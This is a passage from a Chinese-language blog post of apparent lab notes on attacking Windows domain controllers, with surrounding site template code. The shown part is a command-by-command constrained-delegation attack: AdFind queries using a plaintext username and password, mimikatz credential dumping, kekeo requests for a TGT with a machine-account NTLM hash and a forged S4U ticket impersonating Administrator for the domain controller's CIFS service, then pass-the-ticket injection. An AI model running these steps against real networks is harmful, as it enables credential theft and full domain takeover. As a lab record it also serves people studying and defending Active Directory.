<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">查询约束委派机器账户<br>AdFind.exe -h 192.168.3.187 -u test123 -up Abc123.. -b &quot;DC=hsmyzj,DC=xyz&quot; -f &quot; (&amp;(samAccountType=805306368)(msds-allowedtodelegateto=*))&quot; cn distinguishedName msds-allowedtodelegateto<br>查询约束委派主机<br>AdFind.exe -h 192.168.3.187 -u test123 -up Abc123.. -b &quot;DC=hsmyzj,DC=xyz&quot; -f &quot; (&amp;(samAccountType=805306369)(msds-allowedtodelegateto=*))&quot; cn distinguishedName msds-allowedtodelegateto<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711552382462-a292d45b-a0a9-4f29-bec7-26ecd7eecf21.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>查询到test123配置了约束委派，委派的目标是AD-2016(域控)的CIFS服务</p>
<p>2、使用mimikatz获取机器账户NTLM Hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">mimikatz privilege::debug<br>mimikatz sekurlsa::logonpasswords<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711549702370-5390e4ab-9434-49d2-89c4-8254f045bb59.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>3、使用kekeo申请配置了约束委派机器账户PC-ZS$的TGT</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">kekeo &quot;tgt::ask /user:WEB-2016$ /NTLM:311861857b37570908d075802d62d09d /domain:hsmyzj.xyz&quot; &quot;exit&quot;<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711552684805-53a920bf-1496-4294-84a9-5784f03021b6.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>利用TGT通过伪造S4U请求以administrator身份访问PC-ZS的ST</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">kekeo &quot;tgs::s4u /tgt:TGT_WEB-2016$@HSMYZJ.XYZ_krbtgt~hsmyzj.xyz@HSMYZJ.XYZ.kirbi /user:Administrator@hsmyzj.xyz /service:cifs/AD-2016.hsmyzj.xyz&quot; &quot;exit&quot;<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711552817027-4e659294-d7b1-4ced-a3a1-6ad1a20e01c1.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>mimkatz注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">mimikatz kerberos::ptt TGS_Administrator@hsmyzj.xyz@HSMYZJ.XYZ_WEB-2016$@HSMYZJ.XYZ.kirbi<br></code></pre></td></tr></table></figure>

<p><img src="/../../../../%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711552881707-08dc1b84-89ba-48e1-8eab-32ee2e290a2e.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>访问域控</p>
<p><img src="/./%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711552926596-7787c5d4-2187-4969-ae1d-d7bf1e314482.png" srcset="/img/loading.gif" lazyload alt="img"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>域控安全与跨域攻击</div>
      <div>http://example.com/2025/01/06/域控安全与跨域攻击/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年1月6日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/01/06/%E6%89%8B%E6%9C%BAroot%E4%B8%8E%E6%8A%93%E5%8C%85%E7%AC%94%E8%AE%B0/" title="手机root与抓包笔记">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">手机root与抓包笔记</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/01/06/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83/" title="数据库提权">
                        <span class="hidden-mobile">数据库提权</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
